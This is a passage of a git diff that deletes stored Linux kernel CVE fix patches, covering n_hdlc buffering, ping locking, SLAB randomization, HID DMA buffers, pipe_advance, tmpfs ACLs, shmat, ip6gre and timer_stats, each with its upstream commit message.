and has been done */ - if (actual == -ERESTARTSYS) { -- n_hdlc->tbuf = tbuf; -+ n_hdlc_buf_return(&n_hdlc->tx_buf_list, tbuf); - break; - } - /* if transmit error, throw frame away by */ -@@ -435,10 +420,7 @@ static void n_hdlc_send_frames(struct n_hdlc *n_hdlc, struct tty_struct *tty) - - /* free current transmit buffer */ - n_hdlc_buf_put(&n_hdlc->tx_free_buf_list, tbuf); -- -- /* this tx buffer is done */ -- n_hdlc->tbuf = NULL; -- -+ - /* wait up sleeping writers */ - wake_up_interruptible(&tty->write_wait); - -@@ -448,10 +430,12 @@ static void n_hdlc_send_frames(struct n_hdlc *n_hdlc, struct tty_struct *tty) - if (debuglevel >= DEBUG_LEVEL_INFO) - printk("%s(%d)frame %p pending\n", - __FILE__,__LINE__,tbuf); -- -- /* buffer not accepted by driver */ -- /* set this buffer as pending buffer */ -- n_hdlc->tbuf = tbuf; -+ -+ /* -+ * the buffer was not accepted by driver, -+ * return it back into tx queue -+ */ -+ n_hdlc_buf_return(&n_hdlc->tx_buf_list, tbuf); - break; - } - } -@@ -749,7 +733,8 @@ static int n_hdlc_tty_ioctl(struct tty_struct *tty, struct file *file, - int error = 0; - int count; - unsigned long flags; -- -+ struct n_hdlc_buf *buf = NULL; -+ - if (debuglevel >= DEBUG_LEVEL_INFO) - printk("%s(%d)n_hdlc_tty_ioctl() called %d\n", - __FILE__,__LINE__,cmd); -@@ -763,8 +748,10 @@ static int n_hdlc_tty_ioctl(struct tty_struct *tty, struct file *file, - /* report count of read data available */ - /* in next available frame (if any) */ - spin_lock_irqsave(&n_hdlc->rx_buf_list.spinlock,flags); -- if (n_hdlc->rx_buf_list.head) -- count = n_hdlc->rx_buf_list.head->count; -+ buf = list_first_entry_or_null(&n_hdlc->rx_buf_list.list, -+ struct n_hdlc_buf, list_item); -+ if (buf) -+ count = buf->count; - else - count = 0; - spin_unlock_irqrestore(&n_hdlc->rx_buf_list.spinlock,flags); -@@ -776,8 +763,10 @@ static int n_hdlc_tty_ioctl(struct tty_struct *tty, struct file *file, - count = tty_chars_in_buffer(tty); - /* add size of next output frame in queue */ - 
spin_lock_irqsave(&n_hdlc->tx_buf_list.spinlock,flags); -- if (n_hdlc->tx_buf_list.head) -- count += n_hdlc->tx_buf_list.head->count; -+ buf = list_first_entry_or_null(&n_hdlc->tx_buf_list.list, -+ struct n_hdlc_buf, list_item); -+ if (buf) -+ count += buf->count; - spin_unlock_irqrestore(&n_hdlc->tx_buf_list.spinlock,flags); - error = put_user(count, (int __user *)arg); - break; -@@ -825,14 +814,14 @@ static unsigned int n_hdlc_tty_poll(struct tty_struct *tty, struct file *filp, - poll_wait(filp, &tty->write_wait, wait); - - /* set bits for operations that won't block */ -- if (n_hdlc->rx_buf_list.head) -+ if (!list_empty(&n_hdlc->rx_buf_list.list)) - mask |= POLLIN | POLLRDNORM; /* readable */ - if (test_bit(TTY_OTHER_CLOSED, &tty->flags)) - mask |= POLLHUP; - if (tty_hung_up_p(filp)) - mask |= POLLHUP; - if (!tty_is_writelocked(tty) && -- n_hdlc->tx_free_buf_list.head) -+ !list_empty(&n_hdlc->tx_free_buf_list.list)) - mask |= POLLOUT | POLLWRNORM; /* writable */ - } - return mask; -@@ -856,7 +845,12 @@ static struct n_hdlc *n_hdlc_alloc(void) - spin_lock_init(&n_hdlc->tx_free_buf_list.spinlock); - spin_lock_init(&n_hdlc->rx_buf_list.spinlock); - spin_lock_init(&n_hdlc->tx_buf_list.spinlock); -- -+ -+ INIT_LIST_HEAD(&n_hdlc->rx_free_buf_list.list); -+ INIT_LIST_HEAD(&n_hdlc->tx_free_buf_list.list); -+ INIT_LIST_HEAD(&n_hdlc->rx_buf_list.list); -+ INIT_LIST_HEAD(&n_hdlc->tx_buf_list.list); -+ - /* allocate free rx buffer list */ - for(i=0;ispinlock, flags); -+ -+ list_add(&buf->list_item, &buf_list->list); -+ buf_list->count++; -+ -+ spin_unlock_irqrestore(&buf_list->spinlock, flags); -+} -+ -+/** - * n_hdlc_buf_put - add specified HDLC buffer to tail of specified list -- * @list - pointer to buffer list -+ * @buf_list - pointer to buffer list - * @buf - pointer to buffer - */ --static void n_hdlc_buf_put(struct n_hdlc_buf_list *list, -+static void n_hdlc_buf_put(struct n_hdlc_buf_list *buf_list, - struct n_hdlc_buf *buf) - { - unsigned long flags; -- 
spin_lock_irqsave(&list->spinlock,flags); -- -- buf->link=NULL; -- if (list->tail) -- list->tail->link = buf; -- else -- list->head = buf; -- list->tail = buf; -- (list->count)++; -- -- spin_unlock_irqrestore(&list->spinlock,flags); -- -+ -+ spin_lock_irqsave(&buf_list->spinlock, flags); -+ -+ list_add_tail(&buf->list_item, &buf_list->list); -+ buf_list->count++; -+ -+ spin_unlock_irqrestore(&buf_list->spinlock, flags); - } /* end of n_hdlc_buf_put() */ - - /** - * n_hdlc_buf_get - remove and return an HDLC buffer from list -- * @list - pointer to HDLC buffer list -+ * @buf_list - pointer to HDLC buffer list - * - * Remove and return an HDLC buffer from the head of the specified HDLC buffer - * list. - * Returns a pointer to HDLC buffer if available, otherwise %NULL. - */ --static struct n_hdlc_buf* n_hdlc_buf_get(struct n_hdlc_buf_list *list) -+static struct n_hdlc_buf *n_hdlc_buf_get(struct n_hdlc_buf_list *buf_list) - { - unsigned long flags; - struct n_hdlc_buf *buf; -- spin_lock_irqsave(&list->spinlock,flags); -- -- buf = list->head; -+ -+ spin_lock_irqsave(&buf_list->spinlock, flags); -+ -+ buf = list_first_entry_or_null(&buf_list->list, -+ struct n_hdlc_buf, list_item); - if (buf) { -- list->head = buf->link; -- (list->count)--; -+ list_del(&buf->list_item); -+ buf_list->count--; - } -- if (!list->head) -- list->tail = NULL; -- -- spin_unlock_irqrestore(&list->spinlock,flags); -+ -+ spin_unlock_irqrestore(&buf_list->spinlock, flags); - return buf; -- - } /* end of n_hdlc_buf_get() */ - - static char hdlc_banner[] __initdata = --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-2671/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-2671/^4.10/0001.patch deleted file mode 100644 index ec1a087b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-2671/^4.10/0001.patch +++ /dev/null 
@@ -1,55 +0,0 @@ -From 43a6684519ab0a6c52024b5e25322476cabad893 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Fri, 24 Mar 2017 19:36:13 -0700 -Subject: ping: implement proper locking - -We got a report of yet another bug in ping - -http://www.openwall.com/lists/oss-security/2017/03/24/6 - -->disconnect() is not called with socket lock held. - -Fix this by acquiring ping rwlock earlier. - -Thanks to Daniel, Alexander and Andrey for letting us know this problem. - -Fixes: c319b4d76b9e ("net: ipv4: add IPPROTO_ICMP socket kind") -Signed-off-by: Eric Dumazet -Reported-by: Daniel Jiang -Reported-by: Solar Designer -Reported-by: Andrey Konovalov -Signed-off-by: David S. Miller ---- - net/ipv4/ping.c | 5 +++-- - 1 file changed, 3 insertions(+), 2 deletions(-) - -(limited to 'net/ipv4/ping.c') - -diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c -index 2af6244..ccfbce1 100644 ---- a/net/ipv4/ping.c -+++ b/net/ipv4/ping.c -@@ -156,17 +156,18 @@ int ping_hash(struct sock *sk) - void ping_unhash(struct sock *sk) - { - struct inet_sock *isk = inet_sk(sk); -+ - pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num); -+ write_lock_bh(&ping_table.lock); - if (sk_hashed(sk)) { -- write_lock_bh(&ping_table.lock); - hlist_nulls_del(&sk->sk_nulls_node); - sk_nulls_node_init(&sk->sk_nulls_node); - sock_put(sk); - isk->inet_num = 0; - isk->inet_sport = 0; - sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1); -- write_unlock_bh(&ping_table.lock); - } -+ write_unlock_bh(&ping_table.lock); - } - EXPORT_SYMBOL_GPL(ping_unhash); - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-5546/4.7-^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5546/4.7-^4.9/0001.patch deleted file mode 100644 index 284c3e9b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-5546/4.7-^4.9/0001.patch +++ /dev/null 
@@ -1,64 +0,0 @@ -From c4e490cf148e85ead0d1b1c2caaba833f1d5b29f Mon Sep 17 00:00:00 2001 -From: John Sperbeck -Date: Tue, 10 Jan 2017 16:58:24 -0800 -Subject: mm/slab.c: fix SLAB freelist randomization duplicate entries - -This patch fixes a bug in the freelist randomization code. When a high -random number is used, the freelist will contain duplicate entries. It -will result in different allocations sharing the same chunk. - -It will result in odd behaviours and crashes. It should be uncommon but -it depends on the machines. We saw it happening more often on some -machines (every few hours of running tests). - -Fixes: c7ce4f60ac19 ("mm: SLAB freelist randomization") -Link: http://lkml.kernel.org/r/20170103181908.143178-1-thgarnie@google.com -Signed-off-by: John Sperbeck -Signed-off-by: Thomas Garnier -Cc: Christoph Lameter -Cc: Pekka Enberg -Cc: David Rientjes -Cc: Joonsoo Kim -Cc: -Signed-off-by: Andrew Morton -Signed-off-by: Linus Torvalds ---- - mm/slab.c | 8 ++++---- - 1 file changed, 4 insertions(+), 4 deletions(-) - -diff --git a/mm/slab.c b/mm/slab.c -index 29bc6c0..4f2ec6b 100644 ---- a/mm/slab.c -+++ b/mm/slab.c -@@ -2457,7 +2457,6 @@ union freelist_init_state { - unsigned int pos; - unsigned int *list; - unsigned int count; -- unsigned int rand; - }; - struct rnd_state rnd_state; - }; -@@ -2483,8 +2482,7 @@ static bool freelist_state_initialize(union freelist_init_state *state, - } else { - state->list = cachep->random_seq; - state->count = count; -- state->pos = 0; -- state->rand = rand; -+ state->pos = rand % count; - ret = true; - } - return ret; -@@ -2493,7 +2491,9 @@ static bool freelist_state_initialize(union freelist_init_state *state, - /* Get the next entry on the list and randomize it using a random shift */ - static freelist_idx_t next_random_slot(union freelist_init_state *state) - { -- return (state->list[state->pos++] + state->rand) % state->count; -+ if (state->pos >= state->count) -+ state->pos = 0; -+ return state->list[state->pos++]; - 
} - - /* Swap two freelist entries */ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-5547/4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5547/4.9/0001.patch deleted file mode 100644 index f4ad8521..00000000 --- a/Patches/Linux_CVEs/CVE-2017-5547/4.9/0001.patch +++ /dev/null 
@@ -1,144 +0,0 @@
-From 6d104af38b570d37aa32a5803b04c354f8ed513d Mon Sep 17 00:00:00 2001
-From: Johan Hovold
-Date: Thu, 12 Jan 2017 18:17:42 +0100
-Subject: HID: corsair: fix DMA buffers on stack
-
-Not all platforms support DMA to the stack, and specifically since v4.9
-this is no longer supported on x86 with VMAP_STACK either.
-
-Note that the macro-mode buffer was larger than necessary.
-
-Fixes: 6f78193ee9ea ("HID: corsair: Add Corsair Vengeance K90 driver")
-Cc: stable
-Signed-off-by: Johan Hovold
-Signed-off-by: Jiri Kosina
---
- drivers/hid/hid-corsair.c | 54 ++++++++++++++++++++++++++++++++++++-----------
- 1 file changed, 42 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/hid/hid-corsair.c b/drivers/hid/hid-corsair.c
-index 717704e..5971907 100644
---- a/drivers/hid/hid-corsair.c
-+++ b/drivers/hid/hid-corsair.c
-@@ -148,7 +148,11 @@ static enum led_brightness k90_backlight_get(struct led_classdev *led_cdev)
- struct usb_interface *usbif = to_usb_interface(dev->parent);
- struct usb_device *usbdev = interface_to_usbdev(usbif);
- int brightness;
-- char data[8];
-+ char *data;
-+
-+ data = kmalloc(8, GFP_KERNEL);
-+ if (!data)
-+ return -ENOMEM;
-
- ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0),
- K90_REQUEST_STATUS,
-@@ -158,16 +162,22 @@ static enum led_brightness k90_backlight_get(struct led_classdev *led_cdev)
- if (ret < 0) {
- dev_warn(dev, "Failed to get K90 initial state (error %d).\n",
- ret);
-- return -EIO;
-+ ret = -EIO;
-+ goto out;
- }
- brightness = data[4];
- if (brightness < 0 || brightness > 3) {
- dev_warn(dev,
- "Read invalid backlight brightness: %02hhx.\n",
- data[4]);
-- return -EIO;
-+ ret = -EIO;
-+ goto out;
- }
-- return brightness;
-+ ret = brightness;
-+out:
-+ kfree(data);
-+
-+ return ret;
- }
-
- static enum led_brightness k90_record_led_get(struct led_classdev *led_cdev)
-@@ -253,7 +263,11 @@ static ssize_t k90_show_macro_mode(struct device *dev,
- struct usb_interface *usbif = to_usb_interface(dev->parent);
- struct usb_device *usbdev = interface_to_usbdev(usbif);
- const char *macro_mode;
-- char data[8];
-+ char *data;
-+
-+ data = kmalloc(2, GFP_KERNEL);
-+ if (!data)
-+ return -ENOMEM;
-
- ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0),
- K90_REQUEST_GET_MODE,
-@@ -263,7 +277,8 @@ static ssize_t k90_show_macro_mode(struct device *dev,
- if (ret < 0) {
- dev_warn(dev, "Failed to get K90 initial mode (error %d).\n",
- ret);
-- return -EIO;
-+ ret = -EIO;
-+ goto out;
- }
-
- switch (data[0]) {
-@@ -277,10 +292,15 @@ static ssize_t k90_show_macro_mode(struct device *dev,
- default:
- dev_warn(dev, "K90 in unknown mode: %02hhx.\n",
- data[0]);
-- return -EIO;
-+ ret = -EIO;
-+ goto out;
- }
-
-- return snprintf(buf, PAGE_SIZE, "%s\n", macro_mode);
-+ ret = snprintf(buf, PAGE_SIZE, "%s\n", macro_mode);
-+out:
-+ kfree(data);
-+
-+ return ret;
- }
-
- static ssize_t k90_store_macro_mode(struct device *dev,
-@@ -320,7 +340,11 @@ static ssize_t k90_show_current_profile(struct device *dev,
- struct usb_interface *usbif = to_usb_interface(dev->parent);
- struct usb_device *usbdev = interface_to_usbdev(usbif);
- int current_profile;
-- char data[8];
-+ char *data;
-+
-+ data = kmalloc(8, GFP_KERNEL);
-+ if (!data)
-+ return -ENOMEM;
-
- ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0),
- K90_REQUEST_STATUS,
-@@ -330,16 +354,22 @@ static ssize_t k90_show_current_profile(struct device *dev,
- if (ret < 0) {
- dev_warn(dev, "Failed to get K90 initial state (error %d).\n",
- ret);
-- return -EIO;
-+ ret = -EIO;
-+ goto out;
- }
- current_profile = data[7];
- if (current_profile < 1 || current_profile > 3) {
- dev_warn(dev, "Read invalid current profile: %02hhx.\n",
- data[7]);
-- return -EIO;
-+ ret = -EIO;
-+ goto out;
- }
-
-- return snprintf(buf, PAGE_SIZE, "%d\n", current_profile);
-+ ret = snprintf(buf, PAGE_SIZE, "%d\n", current_profile);
-+out:
-+ kfree(data);
-+
-+ return ret;
- }
-
- static ssize_t k90_store_current_profile(struct device *dev,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5550/4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5550/4.9/0001.patch
deleted file mode 100644
index 9ed0c9ba..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5550/4.9/0001.patch
+++ /dev/null
@@ -1,108 +0,0 @@
-From b9dc6f65bc5e232d1c05fe34b5daadc7e8bbf1fb Mon Sep 17 00:00:00 2001
-From: Al Viro
-Date: Sat, 14 Jan 2017 19:33:08 -0500
-Subject: fix a fencepost error in pipe_advance()
-
-The logics in pipe_advance() used to release all buffers past the new
-position failed in cases when the number of buffers to release was equal
-to pipe->buffers. If that happened, none of them had been released,
-leaving pipe full. Worse, it was trivial to trigger and we end up with
-pipe full of uninitialized pages. IOW, it's an infoleak.
-
-Cc: stable@vger.kernel.org # v4.9
-Reported-by: "Alan J. Wylie"
-Tested-by: "Alan J. Wylie"
-Signed-off-by: Al Viro
---
- lib/iov_iter.c | 54 +++++++++++++++++++++++++++++++-----------------------
- 1 file changed, 31 insertions(+), 23 deletions(-)
-
-diff --git a/lib/iov_iter.c b/lib/iov_iter.c
-index 25f5723..e68604a 100644
---- a/lib/iov_iter.c
-+++ b/lib/iov_iter.c
-@@ -730,43 +730,50 @@ size_t iov_iter_copy_from_user_atomic(struct page *page,
- }
- EXPORT_SYMBOL(iov_iter_copy_from_user_atomic);
-
-+static inline void pipe_truncate(struct iov_iter *i)
-+{
-+ struct pipe_inode_info *pipe = i->pipe;
-+ if (pipe->nrbufs) {
-+ size_t off = i->iov_offset;
-+ int idx = i->idx;
-+ int nrbufs = (idx - pipe->curbuf) & (pipe->buffers - 1);
-+ if (off) {
-+ pipe->bufs[idx].len = off - pipe->bufs[idx].offset;
-+ idx = next_idx(idx, pipe);
-+ nrbufs++;
-+ }
-+ while (pipe->nrbufs > nrbufs) {
-+ pipe_buf_release(pipe, &pipe->bufs[idx]);
-+ idx = next_idx(idx, pipe);
-+ pipe->nrbufs--;
-+ }
-+ }
-+}
-+
- static void pipe_advance(struct iov_iter *i, size_t size)
- {
- struct pipe_inode_info *pipe = i->pipe;
-- struct pipe_buffer *buf;
-- int idx = i->idx;
-- size_t off = i->iov_offset, orig_sz;
--
- if (unlikely(i->count < size))
- size = i->count;
-- orig_sz = size;
--
- if (size) {
-+ struct pipe_buffer *buf;
-+ size_t off = i->iov_offset, left = size;
-+ int idx = i->idx;
- if (off) /* make it relative to the beginning of buffer */
-- size += off - pipe->bufs[idx].offset;
-+ left += off - pipe->bufs[idx].offset;
- while (1) {
- buf = &pipe->bufs[idx];
-- if (size <= buf->len)
-+ if (left <= buf->len)
- break;
-- size -= buf->len;
-+ left -= buf->len;
- idx = next_idx(idx, pipe);
- }
-- buf->len = size;
- i->idx = idx;
-- off = i->iov_offset = buf->offset + size;
-- }
-- if (off)
-- idx = next_idx(idx, pipe);
-- if (pipe->nrbufs) {
-- int unused = (pipe->curbuf + pipe->nrbufs) & (pipe->buffers - 1);
-- /* [curbuf,unused) is in use. Free [idx,unused) */
-- while (idx != unused) {
-- pipe_buf_release(pipe, &pipe->bufs[idx]);
-- idx = next_idx(idx, pipe);
-- pipe->nrbufs--;
-- }
-+ i->iov_offset = buf->offset + left;
- }
-- i->count -= orig_sz;
-+ i->count -= size;
-+ /* ... and discard everything past that point */
-+ pipe_truncate(i);
- }
-
- void iov_iter_advance(struct iov_iter *i, size_t size)
-@@ -826,6 +833,7 @@ void iov_iter_pipe(struct iov_iter *i, int direction,
- size_t count)
- {
- BUG_ON(direction != ITER_PIPE);
-+ WARN_ON(pipe->nrbufs == pipe->buffers);
- i->type = direction;
- i->pipe = pipe;
- i->idx = (pipe->curbuf + pipe->nrbufs) & (pipe->buffers - 1);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5551/3.14-^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5551/3.14-^4.9/0001.patch
deleted file mode 100644
index 9da68329..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5551/3.14-^4.9/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 497de07d89c1410d76a15bec2bb41f24a2a89f31 Mon Sep 17 00:00:00 2001
-From: Gu Zheng
-Date: Mon, 9 Jan 2017 09:34:48 +0800
-Subject: tmpfs: clear S_ISGID when setting posix ACLs
-
-This change was missed the tmpfs modification in In CVE-2016-7097
-commit 073931017b49 ("posix_acl: Clear SGID bit when setting
-file permissions")
-It can test by xfstest generic/375, which failed to clear
-setgid bit in the following test case on tmpfs:
-
- touch $testfile
- chown 100:100 $testfile
- chmod 2755 $testfile
- _runas -u 100 -g 101 -- setfacl -m u::rwx,g::rwx,o::rwx $testfile
-
-Signed-off-by: Gu Zheng
-Signed-off-by: Al Viro
---
- fs/posix_acl.c | 9 ++++-----
- 1 file changed, 4 insertions(+), 5 deletions(-)
-
-diff --git a/fs/posix_acl.c b/fs/posix_acl.c
-index 5955220..c9d48dc 100644
---- a/fs/posix_acl.c
-+++ b/fs/posix_acl.c
-@@ -922,11 +922,10 @@ int simple_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- int error;
-
- if (type == ACL_TYPE_ACCESS) {
-- error = posix_acl_equiv_mode(acl, &inode->i_mode);
-- if (error < 0)
-- return 0;
-- if (error == 0)
-- acl = NULL;
-+ error = posix_acl_update_mode(inode,
-+ &inode->i_mode, &acl);
-+ if (error)
-+ return error;
- }
-
- inode->i_ctime = current_time(inode);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5669/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5669/^4.9/0001.patch
deleted file mode 100644
index 151b9470..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5669/^4.9/0001.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From 95e91b831f87ac8e1f8ed50c14d709089b4e01b8 Mon Sep 17 00:00:00 2001
-From: Davidlohr Bueso
-Date: Mon, 27 Feb 2017 14:28:24 -0800
-Subject: ipc/shm: Fix shmat mmap nil-page protection
-
-The issue is described here, with a nice testcase:
-
- https://bugzilla.kernel.org/show_bug.cgi?id=192931
-
-The problem is that shmat() calls do_mmap_pgoff() with MAP_FIXED, and
-the address rounded down to 0. For the regular mmap case, the
-protection mentioned above is that the kernel gets to generate the
-address -- arch_get_unmapped_area() will always check for MAP_FIXED and
-return that address. So by the time we do security_mmap_addr(0) things
-get funky for shmat().
-
-The testcase itself shows that while a regular user crashes, root will
-not have a problem attaching a nil-page. There are two possible fixes
-to this. The first, and which this patch does, is to simply allow root
-to crash as well -- this is also regular mmap behavior, ie when hacking
-up the testcase and adding mmap(... |MAP_FIXED). While this approach
-is the safer option, the second alternative is to ignore SHM_RND if the
-rounded address is 0, thus only having MAP_SHARED flags. This makes the
-behavior of shmat() identical to the mmap() case. The downside of this
-is obviously user visible, but does make sense in that it maintains
-semantics after the round-down wrt 0 address and mmap.
-
-Passes shm related ltp tests.
-
-Link: http://lkml.kernel.org/r/1486050195-18629-1-git-send-email-dave@stgolabs.net
-Signed-off-by: Davidlohr Bueso
-Reported-by: Gareth Evans
-Cc: Manfred Spraul
-Cc: Michael Kerrisk
-Cc:
-Signed-off-by: Andrew Morton
-Signed-off-by: Linus Torvalds
---
- ipc/shm.c | 13 +++++++++----
- 1 file changed, 9 insertions(+), 4 deletions(-)
-
-diff --git a/ipc/shm.c b/ipc/shm.c
-index d7805ac..06ea9ef 100644
---- a/ipc/shm.c
-+++ b/ipc/shm.c
-@@ -1091,8 +1091,8 @@ out_unlock1:
- * "raddr" thing points to kernel space, and there has to be a wrapper around
- * this.
- */
--long do_shmat(int shmid, char __user *shmaddr, int shmflg, ulong *raddr,
-- unsigned long shmlba)
-+long do_shmat(int shmid, char __user *shmaddr, int shmflg,
-+ ulong *raddr, unsigned long shmlba)
- {
- struct shmid_kernel *shp;
- unsigned long addr;
-@@ -1113,8 +1113,13 @@ long do_shmat(int shmid, char __user *shmaddr, int shmflg, ulong *raddr,
- goto out;
- else if ((addr = (ulong)shmaddr)) {
- if (addr & (shmlba - 1)) {
-- if (shmflg & SHM_RND)
-- addr &= ~(shmlba - 1); /* round down */
-+ /*
-+ * Round down to the nearest multiple of shmlba.
-+ * For sane do_mmap_pgoff() parameters, avoid
-+ * round downs that trigger nil-page and MAP_FIXED.
-+ */
-+ if ((shmflg & SHM_RND) && addr >= shmlba)
-+ addr &= ~(shmlba - 1);
- else
- #ifndef __ARCH_FORCE_SHMLBA
- if (addr & ~PAGE_MASK)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5897/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-5897/ANY/0001.patch
deleted file mode 100644
index c4d5a3ce..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5897/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 7892032cfe67f4bde6fc2ee967e45a8fbaf33756 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Sat, 4 Feb 2017 23:18:55 -0800
-Subject: ip6_gre: fix ip6gre_err() invalid reads
-
-Andrey Konovalov reported out of bound accesses in ip6gre_err()
-
-If GRE flags contains GRE_KEY, the following expression
-*(((__be32 *)p) + (grehlen / 4) - 1)
-
-accesses data ~40 bytes after the expected point, since
-grehlen includes the size of IPv6 headers.
-
-Let's use a "struct gre_base_hdr *greh" pointer to make this
-code more readable.
-
-p[1] becomes greh->protocol.
-grhlen is the GRE header length.
-
-Fixes: c12b395a4664 ("gre: Support GRE over IPv6")
-Signed-off-by: Eric Dumazet
-Reported-by: Andrey Konovalov
-Signed-off-by: David S. Miller
---
- net/ipv6/ip6_gre.c | 40 +++++++++++++++++++++-------------------
- 1 file changed, 21 insertions(+), 19 deletions(-)
-
-diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
-index 5586318..630b73b 100644
---- a/net/ipv6/ip6_gre.c
-+++ b/net/ipv6/ip6_gre.c
-@@ -367,35 +367,37 @@ static void ip6gre_tunnel_uninit(struct net_device *dev)
-
-
- static void ip6gre_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
-- u8 type, u8 code, int offset, __be32 info)
-+ u8 type, u8 code, int offset, __be32 info)
- {
-- const struct ipv6hdr *ipv6h = (const struct ipv6hdr *)skb->data;
-- __be16 *p = (__be16 *)(skb->data + offset);
-- int grehlen = offset + 4;
-+ const struct gre_base_hdr *greh;
-+ const struct ipv6hdr *ipv6h;
-+ int grehlen = sizeof(*greh);
- struct ip6_tnl *t;
-+ int key_off = 0;
- __be16 flags;
-+ __be32 key;
-
-- flags = p[0];
-- if (flags&(GRE_CSUM|GRE_KEY|GRE_SEQ|GRE_ROUTING|GRE_VERSION)) {
-- if (flags&(GRE_VERSION|GRE_ROUTING))
-- return;
-- if (flags&GRE_KEY) {
-- grehlen += 4;
-- if (flags&GRE_CSUM)
-- grehlen += 4;
-- }
-+ if (!pskb_may_pull(skb, offset + grehlen))
-+ return;
-+ greh = (const struct gre_base_hdr *)(skb->data + offset);
-+ flags = greh->flags;
-+ if (flags & (GRE_VERSION | GRE_ROUTING))
-+ return;
-+ if (flags & GRE_CSUM)
-+ grehlen += 4;
-+ if (flags & GRE_KEY) {
-+ key_off = grehlen + offset;
-+ grehlen += 4;
- }
-
-- /* If only 8 bytes returned, keyed message will be dropped here */
-- if (!pskb_may_pull(skb, grehlen))
-+ if (!pskb_may_pull(skb, offset + grehlen))
- return;
- ipv6h = (const struct ipv6hdr *)skb->data;
-- p = (__be16 *)(skb->data + offset);
-+ greh = (const struct gre_base_hdr *)(skb->data + offset);
-+ key = key_off ? *(__be32 *)(skb->data + key_off) : 0;
-
- t = ip6gre_tunnel_lookup(skb->dev, &ipv6h->daddr, &ipv6h->saddr,
-- flags & GRE_KEY ?
-- *(((__be32 *)p) + (grehlen / 4) - 1) : 0,
-- p[1]);
-+ key, greh->protocol);
- if (!t)
- return;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch
deleted file mode 100644
index 596f8405..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch
+++ /dev/null
@@ -1,908 +0,0 @@ -From 0407c7a2f4734cd55902753d788fdbdc32ed7fd9 Mon Sep 17 00:00:00 2001 -From: Kees Cook -Date: Wed, 08 Feb 2017 11:26:59 -0800 -Subject: [PATCH] time: Remove CONFIG_TIMER_STATS - -Currently CONFIG_TIMER_STATS exposes process information across namespaces: - -kernel/time/timer_list.c print_timer(): - - SEQ_printf(m, ", %s/%d", tmp, timer->start_pid); - -/proc/timer_list: - - #11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570 - -Given that the tracer can give the same information, this patch entirely -removes CONFIG_TIMER_STATS. - -Change-Id: Ice26d74094d3ad563808342c1604ad444234844b -Suggested-by: Thomas Gleixner -Signed-off-by: Kees Cook -Acked-by: John Stultz -Cc: Nicolas Pitre -Cc: linux-doc@vger.kernel.org -Cc: Lai Jiangshan -Cc: Shuah Khan -Cc: Xing Gao -Cc: Jonathan Corbet -Cc: Jessica Frazelle -Cc: kernel-hardening@lists.openwall.com -Cc: Nicolas Iooss -Cc: "Paul E. McKenney" -Cc: Petr Mladek -Cc: Richard Cochran -Cc: Tejun Heo -Cc: Michal Marek -Cc: Josh Poimboeuf -Cc: Dmitry Vyukov -Cc: Oleg Nesterov -Cc: "Eric W. Biederman" -Cc: Olof Johansson -Cc: Andrew Morton -Cc: linux-api@vger.kernel.org -Cc: Arjan van de Ven -Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast -Signed-off-by: Thomas Gleixner ---- - -diff --git a/Documentation/timers/timer_stats.txt b/Documentation/timers/timer_stats.txt -deleted file mode 100644 -index 8abd40b..0000000 ---- a/Documentation/timers/timer_stats.txt -+++ /dev/null -@@ -1,73 +0,0 @@ --timer_stats - timer usage statistics -------------------------------------- -- --timer_stats is a debugging facility to make the timer (ab)usage in a Linux --system visible to kernel and userspace developers. If enabled in the config --but not used it has almost zero runtime overhead, and a relatively small --data structure overhead. Even if collection is enabled runtime all the --locking is per-CPU and lookup is hashed. 
-- --timer_stats should be used by kernel and userspace developers to verify that --their code does not make unduly use of timers. This helps to avoid unnecessary --wakeups, which should be avoided to optimize power consumption. -- --It can be enabled by CONFIG_TIMER_STATS in the "Kernel hacking" configuration --section. -- --timer_stats collects information about the timer events which are fired in a --Linux system over a sample period: -- --- the pid of the task(process) which initialized the timer --- the name of the process which initialized the timer --- the function where the timer was initialized --- the callback function which is associated to the timer --- the number of events (callbacks) -- --timer_stats adds an entry to /proc: /proc/timer_stats -- --This entry is used to control the statistics functionality and to read out the --sampled information. -- --The timer_stats functionality is inactive on bootup. -- --To activate a sample period issue: --# echo 1 >/proc/timer_stats -- --To stop a sample period issue: --# echo 0 >/proc/timer_stats -- 